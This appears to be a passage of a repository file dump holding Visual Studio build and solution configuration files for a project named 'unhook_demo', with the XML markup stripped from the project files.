Application\r\n false\r\n v142\r\n true\r\n Unicode\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n true\r\n \r\n \r\n true\r\n \r\n \r\n false\r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n \r\n Level3\r\n Disabled\r\n true\r\n WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)\r\n true\r\n \r\n \r\n Console\r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n Level3\r\n Disabled\r\n true\r\n _DEBUG;_CONSOLE;%(PreprocessorDefinitions)\r\n true\r\n \r\n \r\n Console\r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n Level3\r\n MaxSpeed\r\n true\r\n true\r\n true\r\n WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\r\n true\r\n \r\n \r\n Console\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n Level3\r\n MaxSpeed\r\n true\r\n true\r\n true\r\n NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\r\n true\r\n \r\n \r\n Console\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n" }, { "path": "demo6/unhook_demo/unhook_demo.vcxproj.filters", "content": "\r\n\r\n \r\n \r\n {4FC737F1-C7A5-4376-A066-2A32D752A2FF}\r\n cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx\r\n \r\n \r\n {93995380-89BD-4b04-88EB-625FBE52EBFB}\r\n h;hh;hpp;hxx;hm;inl;inc;ipp;xsd\r\n \r\n \r\n {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}\r\n rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms\r\n \r\n \r\n \r\n \r\n Source Files\r\n \r\n \r\n \r\n \r\n Header Files\r\n \r\n \r\n" }, { "path": "demo6/unhook_demo/unhook_demo.vcxproj.user", "content": "\r\n\r\n \r\n" }, { "path": "demo6/unhook_demo.sln", "content": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 16\r\nVisualStudioVersion = 16.0.28729.10\r\nMinimumVisualStudioVersion = 10.0.40219.1\r\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"unhook_demo\", \"unhook_demo\\unhook_demo.vcxproj\", \"{D7F4E23F-325F-4C05-9FD9-5FE851B1A34D}\"\r\nEndProject\r\nGlobal\r\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\r\n\t\tDebug|x64 = Debug|x64\r\n\t\tDebug|x86 = Debug|x86\r\n\t\tRelease|x64 = Release|x64\r\n\t\tRelease|x86 = Release|x86\r\n\tEndGlobalSection\r\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\r\n\t\t{D7F4E23F-325F-4C05-9FD9-5FE851B1A34D}.Debug|x64.ActiveCfg = Debug|x64\r\n\t\t{D7F4E23F-325F-4C05-9FD9-5FE851B1A34D}.Debug|x64.Build.0 = Debug|x64\r\n\t\t{D7F4E23F-325F-4C05-9FD9-5FE851B1A34D}.Debug|x86.ActiveCfg = Debug|Win32\r\n\t\t{D7F4E23F-325F-4C05-9FD9-5FE851B1A34D}.Debug|x86.Build.0 = Debug|Win32\r\n\t\t{D7F4E23F-325F-4C05-9FD9-5FE851B1A34D}.Release|x64.ActiveCfg = Release|x64\r\n\t\t{D7F4E23F-325F-4C05-9FD9-5FE851B1A34D}.Release|x64.Build.0 = Release|x64\r\n\t\t{D7F4E23F-325F-4C05-9FD9-5FE851B1A34D}.Release|x86.ActiveCfg = Release|Win32\r\n\t\t{D7F4E23F-325F-4C05-9FD9-5FE851B1A34D}.Release|x86.Build.0 = Release|Win32\r\n\tEndGlobalSection\r\n\tGlobalSection(SolutionProperties) = preSolution\r\n\t\tHideSolutionNode = FALSE\r\n\tEndGlobalSection\r\n\tGlobalSection(ExtensibilityGlobals) = postSolution\r\n\t\tSolutionGuid = {81617172-DABD-4D8C-9698-CF770298517A}\r\n\tEndGlobalSection\r\nEndGlobal\r\n" } ]